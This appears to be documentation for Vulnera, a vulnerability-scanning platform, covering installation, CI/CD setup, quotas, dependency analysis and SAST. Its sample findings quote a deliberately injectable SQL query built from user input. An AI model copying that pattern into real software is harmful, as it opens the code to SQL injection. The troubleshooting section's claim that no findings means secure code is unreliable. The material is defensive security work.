Vulnera — Modular Vulnerability Analysis Platform
Vulnera is an open-source, async Rust platform for multi-ecosystem vulnerability analysis. It combines four purpose-built detection modules under a single orchestrator with sandboxed execution, a typed job pipeline, and optional LLM enrichment.
All core analysis — SAST, secrets detection, and API security — runs fully offline. Dependency CVE lookups require network access to OSV, NVD, and GHSA. LLM enrichment requires network access to the configured provider.
The Four Analysis Modules
| Module | Method | Coverage | Offline? |
|---|---|---|---|
| Dependency Analysis | CVE lookup (OSV · NVD · GHSA) | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet | ❌ No |
| SAST | Tree-sitter AST + inter-procedural taint analysis | Python, JavaScript, TypeScript, Rust, Go, C, C++ | ✅ Yes |
| Secrets Detection | Regex + entropy detection | All text files | ✅ Yes |
| API Security | Rule-based OpenAPI spec analysis | OpenAPI 3.0 / 3.1 | ✅ Yes |
LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is an optional post-processing pass — it adds explanations and fix suggestions to existing findings but is never part of detection.
Documentation Structure
Getting Started
Role-based quick-start guides:
- Developer Quick Start — run your first scan locally in under 5 minutes
- DevSecOps Quick Start — CI/CD integration, team setup, policy gates
- Cloud Engineer Quick Start — repository scanning, S3 buckets, infrastructure
Analysis Capabilities
- Overview — module selection, offline vs. online, unified finding schema
- AI-Assisted Code Analysis (SAST) — detection methods, language coverage, taint analysis internals
- AI-Assisted Secret Detection — entropy thresholds, baseline support, Git history scanning
Module Reference
- Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
- SAST — supported languages, rule packs, confidence scoring
- Secrets Detection — detection methods, secret types, baselines
- API Security — analysis categories, OAuth/OIDC checks, strict mode
AI-Powered Features
- LLM Explanations & Auto-Fixes — provider setup, quotas, caching
Dashboard & Web Platform
- Dashboard Guide — web UI overview
- Organization Management — teams, members, shared quota
- Team Collaboration — workflows for security teams
Reference
- Configuration — environment variable reference with defaults
- System Architecture — DDD layering, composition root, cache architecture
- Orchestrator Observability — job lifecycle event model, instrumentation strategy
- FAQ — quota, offline capabilities, false positives, troubleshooting
Offline vs. Online Boundaries
Fully offline (no network required):
- SAST
- Secrets Detection
- API Security
Requires network:
- Dependency Analysis (OSV/NVD/GHSA lookups)
- LLM enrichment (explanations and fixes)
Self-Hosting
The server is a single Rust binary backed by PostgreSQL and optionally Dragonfly/Redis.
Minimum requirements:
- Rust 1.91+ (build only)
- PostgreSQL 12+
- Linux 5.13+ recommended (for Landlock sandbox; process isolation fallback works on older kernels)
export DATABASE_URL='postgresql://user:pass@localhost:5432/vulnera'
sqlx migrate run
cargo run
Full configuration reference: Configuration
License
Server and all analysis modules: AGPL-3.0-or-later
CLI, Advisors, LSP Adapter: AGPL-3.0-or-later (see each workspace’s LICENSE file)
Contributing
See the project README for the contribution guide, roadmap, and high-impact areas open for community work.
Developer Quick Start (5 Minutes)
For: Individual developers who want offline vulnerability scanning integrated into their workflow.
Goal: Run your first security analysis on a local project in under 5 minutes.
Install Vulnera CLI
Choose your platform:
macOS
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-macos-aarch64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/
Linux
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/
Windows
Download from GitHub Releases, add to PATH.
Verify Installation
vulnera --version
# Output: Vulnera 0.5.1
Run Your First Analysis (Offline)
# Analyze your current project
vulnera analyze .
# Or any directory
vulnera analyze /path/to/my/nodejs-app
What happens:
- ✅ Scans all code files for security issues
- ✅ Detects hardcoded secrets (API keys, tokens, credentials)
- ✅ Checks for code injection vulnerabilities
- ✅ Analyzes OpenAPI specs if present
- ⏱️ Takes 1-10 seconds depending on project size
Output (default table view):
┌────────────────────────────────────────────────────────────┐
│ Vulnera Security Analysis Report │
├────────────────────────────────────────────────────────────┤
│ Analysis Duration: 2.3 seconds │
│ Modules Run: SAST, Secrets, API │
│ Total Findings: 5 │
├────────────────────────────────────────────────────────────┤
│ SEVERITY │ COUNT │ MODULE │ REMEDIATION │
├──────────┼───────┼───────────────┼──────────────────────────┤
│ HIGH │ 2 │ Secrets │ Remove hardcoded keys │
│ MEDIUM │ 2 │ SAST (Python) │ Use parameterized queries│
│ LOW │ 1 │ API Spec │ Add security headers │
└────────────────────────────────────────────────────────────┘
See Detailed Findings
vulnera analyze . --format json | jq '.findings[]'
Sample finding:
{
"id": "SAST-SQL-001",
"type": "SQL Injection",
"severity": "high",
"file": "app.py",
"line": 42,
"message": "User input concatenated into SQL query",
"code": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
"remediation": "Use parameterized queries: db.query('SELECT * FROM users WHERE id=?', [user_id])"
}
Get AI-Powered Explanations
Want to understand why a finding is important?
# Option 1: Output directly shows summaries
vulnera analyze . --format table
# Option 2: Export to JSON and filter
vulnera analyze . --format json | jq '.findings[] | {id, type, message, remediation}'
Authenticate for Extra Features
Get 4x more quota and enable dependency scanning:
# Get API key at: https://vulnera.studio/dashboard/keys
vulnera auth login --api-key YOUR_API_KEY
# Now you can scan dependencies
vulnera analyze . --all-modules
Pre-Commit Integration
Automatically scan before commits:
Add to .git/hooks/pre-commit
#!/bin/sh
# Run Vulnera analysis on staged files
vulnera analyze . --severity high
if [ $? -ne 0 ]; then
echo "❌ Security issues found. Fix before committing."
exit 1
fi
Make it Executable
chmod +x .git/hooks/pre-commit
Test It
git add .
git commit -m "test"
# Will run Vulnera scan before commit
CI/CD Integration
GitHub Actions
Create .github/workflows/security.yml:
name: Security Analysis
on: [push, pull_request]
jobs:
vulnera:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/download-artifact@v4
with:
name: vulnera
- run: chmod +x vulnera && ./vulnera analyze . --severity high
GitLab CI
Add to .gitlab-ci.yml:
security:
script:
- curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
- chmod +x vulnera
- ./vulnera analyze . --severity high
Common Commands
# Analyze only secrets (skip code analysis)
vulnera analyze . --skip-sast
# Show only high/critical severity
vulnera analyze . --severity high
# Export to SARIF (for IDE integration)
vulnera analyze . --format sarif > report.sarif
# Check your quota
vulnera quota
# Offline mode (don't use dependency scanning)
vulnera analyze . --offline
Next Steps
- Integrate into your IDE → IDE Extensions
- Learn about all analysis types → Analysis Capabilities
- Get AI-powered explanations → LLM Features
- Setup for team usage → DevSecOps Quick Start
Troubleshooting
Q: No findings found—is it working?
A: That’s good! Your code is secure. Try with --show-passed to see all checks run.
Q: Getting “permission denied” error?
A: Make sure the binary is executable: chmod +x vulnera
Q: Want to see what’s detected?
A: Run with verbose output: vulnera analyze . -v
Q: Dependency scanning not working? A: You need to authenticate. Get an API key at https://vulnera.studio/dashboard/keys
Questions? Join us on Discord or check the full documentation.
DevSecOps Quick Start (10 Minutes)
For: Security team leads and DevSecOps engineers managing organization-wide vulnerability scanning.
Goal: Set up team-based security scanning with shared quotas, analytics, and multi-project orchestration.
Step 1: Create Organization
vulnera organizations create \
--name "Engineering Security Team" \
--description "Security scanning for all projects"
Output:
Organization created: org-abc123
Shared daily quota: 48 tokens (vs 40 for single user)
Admin URL: https://vulnera.studio/orgs/org-abc123/settings
Step 2: Invite Team Members
# Invite security engineer
vulnera organizations add-member \
--org org-abc123 \
--email alice@company.com \
--role admin
# Invite developer with view-only access
vulnera organizations add-member \
--org org-abc123 \
--email bob@company.com \
--role viewer
Roles
| Role | Capabilities |
|---|---|
| Owner | Create/delete org, manage members, billing, analytics |
| Admin | Run scans, manage members, view analytics |
| Analyst | Run scans, view results, comment on findings |
| Viewer | View-only access to results and analytics |
Step 3: Setup Continuous Scanning
GitHub Organization Integration
# Store Vulnera API key as GitHub secret
# Go to Settings → Secrets and variables → Actions → New repository secret
# Name: VULNERA_API_KEY
# Value: (get from vulnera dashboard)
Create .github/workflows/vulnera-scan.yml:
name: Vulnera Security Scan
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
schedule:
- cron: "0 2 * * *" # Daily at 2 AM
jobs:
vulnera:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Download Vulnera CLI
run: |
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
- name: Run Full Security Analysis
env:
VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
run: |
./vulnera analyze . \
--all-modules \
--format json \
--output vulnera-report.json
- name: Report Results
run: |
./vulnera report vulnera-report.json \
--format github \
--post-to-pr
Step 4: View Organization Analytics
# Get team usage summary
vulnera organizations analytics dashboard --org org-abc123
# Get historical usage (last 3 months)
vulnera organizations analytics usage --org org-abc123 --months 3
Sample output:
Organization: Engineering Security Team
Period: December 2024
Daily Usage Trend:
Dec 1: ▄ 28 tokens (70%)
Dec 2: █ 47 tokens (98%) ← Peak
Dec 3: ▂ 12 tokens (30%)
Avg: ▃ 31 tokens (65%)
Per-Member Breakdown:
Alice (alice@company.com): 156 tokens (52%)
Bob (bob@company.com): 89 tokens (30%)
Charlie (charlie@...): 54 tokens (18%)
Recommendations:
- High usage on Dec 2. Consider optimizing batch operations.
- LLM features used 45% of quota. See quota-pricing.md for cost details.
Step 5: Create Shared Scanning Policies
Severity Filters
# Define which issues to alert on
vulnera organizations policy create \
--org org-abc123 \
--name "Production Policy" \
--min-severity critical,high \
--affected-projects "*-prod"
Exemptions
# Exclude known false positives
vulnera organizations policy exempt \
--org org-abc123 \
--finding-id SAST-SQL-001 \
--reason "Legacy code, deprecated but functional" \
--expires 2025-06-30
Step 6: Setup Notifications
Slack Integration
# Get Vulnera webhook URL from dashboard
vulnera organizations integrations connect slack \
--org org-abc123 \
--webhook-url https://hooks.slack.com/services/YOUR/WEBHOOK/URL
Notification Rules
# Alert on any critical finding
vulnera organizations notifications create \
--org org-abc123 \
--name "Critical Alerts" \
--condition "severity == critical" \
--channel slack
# Weekly summary
vulnera organizations notifications create \
--org org-abc123 \
--name "Weekly Summary" \
--condition "summary" \
--frequency weekly \
--channel email
Step 7: Scan Multiple Repositories
# Create scanning profile
vulnera organizations profile create \
--org org-abc123 \
--name "Standard Scan" \
--modules "sast,secrets,deps,api" \
--severity-threshold "high"
# Scan repositories
vulnera scan-repos \
--org org-abc123 \
--profile "Standard Scan" \
--repos "my-org/repo-1,my-org/repo-2,my-org/repo-3"
Step 8: Monitor and Report
Dashboard View
# Open web dashboard
open https://vulnera.studio/orgs/org-abc123/dashboard
Shows:
- Real-time scan status
- Vulnerability trends
- Team member activity
- Quota usage
- Historical comparisons
Export Reports
# Export findings to compliance format
vulnera organizations report export \
--org org-abc123 \
--format sarif \
--period "last-month" \
--output compliance-report.sarif
# Email to stakeholders
vulnera organizations report email \
--org org-abc123 \
--recipients security-team@company.com \
--include-recommendations
Quota Management for Teams
Shared Quota Model
Organization Daily Quota: 48 tokens
Typical usage:
Monday (high activity): 45 tokens
Tuesday (low activity): 8 tokens
Wednesday-Friday (average): 20 tokens each
Weekly pattern: Usually peaks Monday, dips on weekends
Recommendation: Schedule large scans Monday morning
Cost Optimization
# Only scan high/critical severity to save quota
vulnera analyze . --severity high
# Batch LLM explanations (costs 6 tokens total vs 6 per finding)
vulnera analyze . --batch-llm-enrich
# Use organizational discount (48 tokens vs 40 individual)
# 20% savings per team member
Integration Examples
Jira Integration
Auto-create Jira tickets for high-severity findings:
vulnera organizations integrations connect jira \
--org org-abc123 \
--jira-url https://company.atlassian.net \
--api-token YOUR_TOKEN \
--auto-create-issues \
--severity-threshold high
Datadog/New Relic APM
Send security metrics to monitoring:
vulnera organizations integrations connect datadog \
--org org-abc123 \
--api-key YOUR_DATADOG_KEY \
--send-metrics \
--metric-tags "team:security,env:prod"
Common Workflows
Scan on Every Push
# GitHub Actions workflow (see Step 3)
# Results appear as GitHub check
# PR comments show new findings
# Auto-block PRs with critical issues (optional)
Scan on Merge Request
# GitLab CI pipeline
# Results in MR discussion
# Approve/block based on findings
Weekly Security Reports
# Cron job to generate reports
0 9 * * 1 vulnera report generate --org org-abc123 --email security@company.com
Monitoring & Alerting
# Setup alert for quota approaching limit
vulnera organizations alerts create \
--org org-abc123 \
--alert "quota_threshold" \
--threshold 90 \
--action "email-admin"
# Alert on policy violations
vulnera organizations alerts create \
--org org-abc123 \
--alert "policy_violation" \
--action "slack-notification"
Next Steps
- Understand quota costs → Quota & Pricing
- Create custom analysis policies → Policy Configuration
Need help? Contact support or join our security community Discord.
Quota & Pricing
This document explains how local CLI quotas and server rate limits work, and how they differ.
Two Separate Systems
1) CLI Local Quota (Per Machine)
The CLI enforces a local daily request limit and persists usage on the machine.
Limits (CLI):
- Unauthenticated: 10 requests/day
- Authenticated (API key): 40 requests/day
Where this lives:
- Stored locally by the CLI (per machine)
- Reset at UTC midnight
- You can check status with
vulnera quota
Commands:
vulnera auth status
vulnera quota
vulnera quota sync
Notes:
- The CLI quota is a local guardrail and can be synced with server state if the server is reachable.
- Offline mode uses local quota only.
2) Server Rate Limits (API)
The server enforces tiered rate limits and token costs per request. This is authoritative for hosted/self-hosted API usage.
Default tiers (from config/default.toml):
- API key: 100 req/min, 2000 req/hour, burst 20
- Authenticated (cookie): 60 req/min, 1000 req/hour, burst 10
- Anonymous: 10 req/min, 100 req/hour, burst 5
- Org bonus: +20% to tier limits
Token cost weights (per request):
GET= 1POST/PUT/DELETE= 2- Analysis = 3
- LLM = 6
These costs apply to the server-side rate limiter, not the CLI local tracker.
Practical Examples
CLI (Local)
vulnera analyze .→ consumes 1 local requestvulnera deps .→ consumes 1 local request + server usage
Server (API)
POST /api/v1/analyze/job→ costanalysis = 3POST /api/v1/llm/explain→ costllm = 6GET /api/v1/quota→ costget = 1
How to Check Usage
CLI (Local)
vulnera quota
Server (API)
curl https://api.vulnera.studio/api/v1/quota \
-H "X-API-Key: <your_api_key>"
Configuration (Server)
Server limits live in config/default.toml:
server.rate_limit.tiers.*for rate tiersserver.rate_limit.costs.*for request cost weightsserver.rate_limit.tiers.org_bonus_percent
Override with environment variables using the VULNERA__ prefix.
Guidance
- Use the CLI locally for offline modules (SAST, Secrets, API).
- Use server-backed analysis for dependency scanning and LLM features.
- Batch LLM enrichment to reduce total cost.
Troubleshooting
Local CLI says quota exceeded
- Wait for UTC reset or authenticate for 40/day
- Use
vulnera auth loginandvulnera quota
Server returns 429
- You’ve exceeded the configured server tier limits
- Reduce request volume or increase limits in server config
Cloud Engineer Quick Start (10 Minutes)
For: Cloud/infrastructure engineers scanning S3 buckets, repositories, and cloud-hosted projects.
Goal: Scan cloud resources at scale with automated workflows.
Step 1: Install & Authenticate
# Install CLI
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
# Authenticate with API key (get from https://vulnera.studio/dashboard/keys)
vulnera auth login --api-key YOUR_API_KEY
Step 2: Scan S3 Buckets
Scan Single Bucket
vulnera analyze s3://my-bucket/src \
--aws-profile default \
--recursive
Scan Multiple Buckets
# Create scanning config
cat > s3-scan-config.toml << EOF
[buckets]
include_patterns = ["prod-*", "app-*"]
exclude_patterns = ["archive-*", "temp-*"]
max_file_size = 1000000 # 1MB
EOF
vulnera analyze-cloud s3 \
--config s3-scan-config.toml \
--format json \
--output s3-findings.json
AWS Credentials
# Use AWS profile
export AWS_PROFILE=production
vulnera analyze s3://production-bucket/
# Or explicit credentials
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
vulnera analyze s3://my-bucket/
Step 3: Scan GitHub Repositories
Single Repository
vulnera analyze github://owner/repo \
--branch main \
--depth full
Organization-Wide Scan
# Scan all repositories in organization
vulnera scan-repos \
--source github \
--org my-company \
--visibility public,private \
--output org-findings.json
Exclude Patterns
vulnera scan-repos \
--source github \
--org my-company \
--exclude "tests/*,vendor/*,node_modules/*" \
--max-file-size 1000000
Step 4: Cloud-Native CI/CD Pipelines
AWS CodePipeline
# buildspec.yml
version: 0.2
phases:
install:
commands:
- curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
- chmod +x vulnera
build:
commands:
- ./vulnera analyze . --all-modules --format json --output vulnera-findings.json
- ./vulnera report vulnera-findings.json --format codepipeline
artifacts:
files:
- vulnera-findings.json
Azure Pipelines
trigger:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: DownloadSecureFile@1
inputs:
secureFile: 'vulnera-api-key'
- script: |
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
./vulnera auth login --api-key $(cat $(Agent.TempDirectory)/vulnera-api-key)
./vulnera analyze . --all-modules
- task: PublishBuildArtifacts@1
inputs:
pathToPublish: 'vulnera-findings.json'
GCP Cloud Build
steps:
- name: 'gcr.io/cloud-builders/docker'
args:
- 'build'
- '-t'
- 'gcr.io/$PROJECT_ID/vulnera-scanner'
- '.'
- name: 'gcr.io/$PROJECT_ID/vulnera-scanner'
env:
- 'VULNERA_API_KEY=$_VULNERA_API_KEY'
args:
- 'analyze'
- '/workspace'
- '--all-modules'
- '--format'
- 'json'
Step 5: Kubernetes & Container Scanning
Scan Docker Images
# Before pushing to registry
docker run -v /path/to/app:/app vulnera-scanner \
analyze /app \
--all-modules \
--severity high
Kubernetes Deployment
# kubernetes-job.yaml
apiVersion: batch/v1
kind: CronJob
metadata:
name: vulnera-scanner
spec:
schedule: "0 2 * * *" # 2 AM daily
jobTemplate:
spec:
template:
spec:
containers:
- name: vulnera
image: vulnera-scanner:latest
env:
- name: VULNERA_API_KEY
valueFrom:
secretKeyRef:
name: vulnera-credentials
key: api-key
command:
- sh
- -c
- |
vulnera analyze /source --all-modules --format json > /results/findings.json
vulnera report /results/findings.json --format kubernetes
volumeMounts:
- name: source
mountPath: /source
- name: results
mountPath: /results
volumes:
- name: source
emptyDir: {}
- name: results
persistentVolumeClaim:
claimName: scan-results-pvc
restartPolicy: OnFailure
Step 6: Terraform Scanning
Scan Infrastructure Code
# Scan Terraform modules for security issues
vulnera analyze ./terraform \
--format json \
--output tf-findings.json
# Filter by resource type
vulnera findings filter \
--input tf-findings.json \
--resource-type aws_security_group \
--output sg-issues.json
Terraform Module Registry Integration
# main.tf
module "vulnera_scan" {
source = "git::https://github.com/Vulnera-rs/Vulnera.git//terraform/modules/scanner"
bucket_name = "my-infrastructure"
schedule = "cron(0 2 * * ? *)" # Daily at 2 AM
tags = {
Environment = "production"
}
}
Step 7: Multi-Cloud Scanning
Scan All Cloud Resources
# Scan across multiple cloud providers
vulnera scan-cloud \
--providers aws,azure,gcp \
--config multi-cloud-config.toml \
--parallel 10
# Results aggregated by resource type
vulnera report cloud-findings.json \
--group-by provider \
--format html
Configuration Example
[aws]
regions = ["us-east-1", "us-west-2", "eu-west-1"]
include_s3 = true
include_ec2_images = true
include_rds = true
[azure]
subscriptions = ["prod", "staging"]
include_storage = true
[gcp]
projects = ["project-prod", "project-staging"]
include_storage = true
Step 8: Automated Compliance Reporting
Generate Compliance Reports
# SOC 2 Report
vulnera report generate \
--format soc2 \
--period month \
--include-trends \
--output soc2-compliance.html
# HIPAA Report
vulnera report generate \
--format hipaa \
--include-remediation \
--output hipaa-compliance.html
Email Reports Automatically
# Schedule weekly reports
vulnera organizations notifications create \
--org my-cloud-team \
--name "Weekly Cloud Security" \
--frequency weekly \
--day monday \
--time 9:00 \
--recipients security@company.com
Common Cloud Workflows
Daily S3 Compliance Check
#!/bin/bash
# daily-s3-scan.sh
BUCKET="production-data"
DATE=$(date +%Y-%m-%d)
REPORT_DIR="/var/reports/vulnera"
vulnera analyze s3://${BUCKET} \
--recursive \
--format json \
--output ${REPORT_DIR}/${DATE}-findings.json
# Alert if critical findings
CRITICAL_COUNT=$(jq '[.findings[] | select(.severity=="critical")] | length' ${REPORT_DIR}/${DATE}-findings.json)
if [ $CRITICAL_COUNT -gt 0 ]; then
echo "Critical findings in $BUCKET: $CRITICAL_COUNT" | \
mail -s "ALERT: S3 Security Issues" security@company.com
fi
Multi-Region Analysis
# Parallel scanning across regions
for region in us-east-1 us-west-2 eu-west-1; do
vulnera analyze-cloud s3 \
--region $region \
--output findings-${region}.json &
done
wait
Performance Optimization
Parallel Processing
# Scan multiple buckets in parallel
vulnera analyze-cloud s3 \
--parallel-jobs 10 \
--max-file-workers 8
Caching
# Enable caching (24-hour default)
vulnera analyze s3://bucket \
--cache enabled \
--cache-ttl 86400
Large Scale Scans
# For enterprise environments
vulnera analyze-cloud \
--batch-size 1000 \
--queue-depth 500 \
--workers 32 \
--output enterprise-findings.json
Next Steps
- Setup organization for team coordination → DevSecOps Quick Start
- Understand quota for large-scale scans → Quota & Pricing
Need enterprise support? Contact sales@vulnera.studio
Analysis Capabilities Overview
Vulnera provides four specialized analysis modules powered by purpose-built detection techniques. Each module is independently selectable and produces findings in a unified schema.
The Four Analysis Modules
| Module | Purpose | Method | Offline? | Coverage |
|---|---|---|---|---|
| Dependency Analysis | Find known CVEs in third-party packages | Registry lookup (OSV · NVD · GHSA) | ❌ No | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet |
| SAST | Find security flaws in source code | Tree-sitter AST + inter-procedural taint analysis | ✅ Yes | Python, JavaScript, TypeScript, Rust, Go, C, C++ |
| Secrets Detection | Find exposed credentials and tokens | Regex + entropy detection | ✅ Yes | All text files |
| API Security | Find misconfigurations in API specs | Rule-based spec analysis | ✅ Yes | OpenAPI 3.0 / 3.1 |
LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is a separate post-processing pass that explains and proposes fixes for findings produced by the modules above. It is never part of detection and requires network access.
How Module Selection Works
The orchestrator uses RuleBasedModuleSelector to automatically activate modules based on file patterns and analysis depth. You do not need to specify modules manually — the right ones run based on what is in the project.
Incoming source (directory / git / S3)
│
▼
File pattern detection
│
├─ dependency manifests found? → Dependency Analysis
├─ .py / .js / .ts / .rs / .go / .c / .cpp files? → SAST
├─ all files → Secrets Detection (always runs in Full)
└─ openapi.yaml / openapi.json / swagger.yaml found? → API Security
│
▼
Parallel execution (one sandbox per module)
│
▼
Aggregated findings report
Analysis Depth (Orchestrator)
The orchestrator uses a coarse analysis depth to decide which modules to run:
| Depth | Description | Modules |
|---|---|---|
dependencies_only | Dependencies only | deps |
fast_scan | Fast scan (dependencies + minimal code analysis) | deps + sast |
full | Full analysis (all applicable modules) | deps + sast + secrets + api |
Note: Module coverage still depends on project content. For example, SAST only runs if supported source files are present, and API Security only runs if an OpenAPI spec is detected.
Analysis Depth (SAST)
The SAST module has its own depth semantics (separate from orchestrator depth):
| Depth | Description |
|---|---|
quick | Fast pattern matching only (no data-flow analysis) |
standard | Balanced analysis (patterns + intra-procedural data flow) |
deep | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable via VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.
Offline vs. Online Capabilities
Fully offline (no network required)
- SAST — rule packs embedded at compile time
- Secrets Detection — regex + entropy detection locally
- API Security — OpenAPI rules locally
Requires network
- Dependency Analysis — CVE lookup against OSV, NVD, GHSA, and registries
- LLM enrichment — explanations and fixes via external providers
Unified Finding Schema
Every module emits findings in the same structure:
{
"id": "SAST-PY-SQL-001",
"type": "vulnerability",
"rule_id": "python-sql-injection",
"location": {
"path": "src/db.py",
"line": 42,
"column": 5,
"end_line": 42,
"end_column": 48
},
"severity": "high",
"confidence": "high",
"description": "User input concatenated directly into SQL query.",
"recommendation": "Use parameterized queries or a query builder.",
"secret_metadata": null,
"vulnerability_metadata": {
"snippet": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
"bindings": null,
"semantic_path": null
},
"enrichment": null
}
The enrichment field is populated only when LLM enrichment is requested after analysis; secret_metadata is only present for secret findings.
Module-Specific Documentation
- Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
- SAST — supported languages, rule packs, taint analysis, confidence scoring
- Secrets Detection — detection methods, secret types, baselines
- API Security — analysis categories, detected issue types, strict mode
Dependency Analysis
The Dependency Analysis module scans dependency manifests and lockfiles across multiple ecosystems to identify known vulnerabilities. It requires network access for CVE lookups (OSV, NVD, GHSA).
Supported Ecosystems
| Ecosystem | Files |
|---|---|
| Python (PyPI) | requirements.txt, Pipfile, pyproject.toml |
| Node.js (npm) | package.json, package-lock.json, yarn.lock |
| Java (Maven/Gradle) | pom.xml, build.gradle |
| Rust (Cargo) | Cargo.toml, Cargo.lock |
| Go | go.mod, go.sum |
| PHP (Composer) | composer.json, composer.lock |
| Ruby (Bundler) | Gemfile, Gemfile.lock |
| .NET (NuGet) | packages.config, *.csproj, *.props, *.targets |
Online Requirement
Dependency analysis requires a server connection to query vulnerability sources:
- OSV
- NVD
- GHSA
Running in offline mode skips dependency analysis.
Resolution Strategy
Vulnera uses a hybrid resolution approach:
- Lockfile-first — Extracts a fully resolved dependency tree from lockfiles for accurate transitive coverage.
- Manifest-only fallback — Best-effort resolution via registry metadata when lockfiles are absent.
Known gaps: Lockfile-independent transitive resolution is incomplete for some ecosystems (notably npm and PyPI).
Features
- Directed dependency graph with reachability analysis
- Concurrent vulnerability lookups with configurable limits
- Safe version recommendations with patch/minor/major impact classification
- CWE normalization and filtering
- Advisory intelligence via
vulnera-advisor
Detail Levels
| Level | Best For | Includes |
|---|---|---|
minimal | Status badges | Vulnerabilities list, basic metadata |
standard | Inline decorations, quick fixes | Vulnerabilities, packages, version recommendations |
full | Detailed reports, dependency trees | All data + dependency graph |
Output Example
{
"package": "lodash",
"current_version": "4.17.15",
"vulnerability": "CVE-2021-23337",
"recommendations": {
"nearest_safe": "4.17.21",
"latest_safe": "4.17.21",
"upgrade_impact": "patch"
}
}
CLI Usage
Dependency analysis runs via vulnera deps (online only):
# Basic scan
vulnera deps .
# Include transitive dependencies
vulnera deps . --include-transitive
# Force rescan (ignore local cache)
vulnera deps . --force-rescan
Next Steps
SAST Module (Static Application Security Testing)
The SAST module performs offline, multi-language static analysis using Tree-sitter parsing, optional OXC frontend for JS/TS, and inter-procedural taint analysis with call-graph support.
Overview
SAST analyzes source code to detect security flaws such as injection, insecure crypto, unsafe deserialization, and risky unsafe usage patterns. It emits findings in Vulnera’s unified schema and supports SARIF output.
Supported Languages
| Language | Parser | File Extensions |
|---|---|---|
| Python | tree-sitter-python | .py |
| JavaScript | tree-sitter-javascript / OXC | .js |
| TypeScript | tree-sitter-javascript / OXC | .ts |
| Rust | tree-sitter-rust | .rs |
| Go | tree-sitter-go | .go |
| C | tree-sitter-c | .c, .h |
| C++ | tree-sitter-cpp | .cpp, .cc, .hpp |
Note: JSX/TSX files are not scanned.
Pipeline (High-Level)
- Discovery — Walks files and maps them to supported languages.
- Parsing — Builds ASTs with Tree-sitter; optional OXC for JS/TS.
- Rule matching — Applies TOML rule packs to AST patterns.
- Taint analysis — Tracks source → sink flow across functions and files.
- Call graph — Resolves cross-file calls to expand reachability.
- Post-process — Dedupes, scores severity/confidence, emits findings.
Rule System
SAST rules are TOML-based and embedded at build time. Optional Git-based rule packs can be configured.
Rule locations:
vulnera-sast/rules/*.toml— core rule packsvulnera-sast/taint-patterns/*.toml— taint sources/sinks/sanitizersvulnera-sast/tests/fixtures/— CVE fixtures for quality gates
Analysis Depth (SAST)
Depth controls the SAST engine’s thoroughness (separate from orchestrator depth):
| Depth | Description |
|---|---|
quick | Pattern matching only (no data-flow analysis) |
standard | Patterns + intra-procedural data flow |
deep | Full analysis (patterns + data flow + call graph + inter-procedural) |
Dynamic depth adjustment is enabled by default to keep large repos within time budgets.
CLI Usage (Actual Flags)
# Basic scan
vulnera sast .
# Severity filter
vulnera sast . --min-severity high
# Only changed files (git required)
vulnera sast . --changed-only
# Exclude paths (glob patterns)
vulnera sast . --exclude "tests/*,vendor/*"
Available flags:
--min-severity <critical|high|medium|low>--fail-on-vuln--changed-only--files <path1,path2,...>--exclude <glob1,glob2,...>--languages <lang1,lang2,...>(override auto-detection)--rules <category1,category2,...>(rule categories)--no-cache(disable incremental cache)--watch(continuous scanning)--fix(LLM-powered bulk fixes; requires online + auth + quota)--baseline <path>(baseline file for diff)--save-baseline(save current findings to baseline)--only-new(report only findings not in baseline)
Configuration
Configured via vulnera_core::config::SastConfig and AnalysisConfig.
Key settings:
analysis_depth = "quick|standard|deep"js_ts_frontend = "oxc_preferred" | "tree_sitter"enable_data_flow,enable_call_graphenable_ast_cache,ast_cache_ttl_hoursdynamic_depth_enabled, file/size thresholdsmin_finding_severity,min_finding_confidencerule_packsandrule_pack_allowlist
Example (TOML):
[sast]
analysis_depth = "standard"
js_ts_frontend = "oxc_preferred"
enable_data_flow = true
enable_call_graph = true
enable_ast_cache = true
dynamic_depth_enabled = true
min_finding_severity = "low"
min_finding_confidence = "low"
Output
Findings include:
severityandconfidencelocation(path + line/column)- optional
snippetandsemantic_path(taint trace)
SARIF output:
vulnera sast . --format sarif > report.sarif
Quality Gates
Fixture-based accuracy thresholds are enforced in CI (from config/default.toml):
- Precision: ≥ 0.70
- Recall: ≥ 0.50
- Unique CWE coverage: ≥ 12
- Languages with fixtures: ≥ 7
Limitations
- Tree-sitter is syntax-level; no macro expansion or full type resolution.
- Runtime behavior and dynamic code generation are out of scope.
- JSX/TSX files are excluded.
Next Steps
SAST (Static Application Security Testing)
Vulnera SAST detects security issues in source code using Tree-sitter parsing, a call-graph builder, and inter-procedural taint analysis. It is fully offline and runs locally.
What It Detects
Common categories include:
- SQL injection and command injection
- XSS and HTML injection
- Unsafe deserialization and dynamic code execution
- Insecure crypto and weak randomness
- Path traversal and file disclosure
- Unsafe
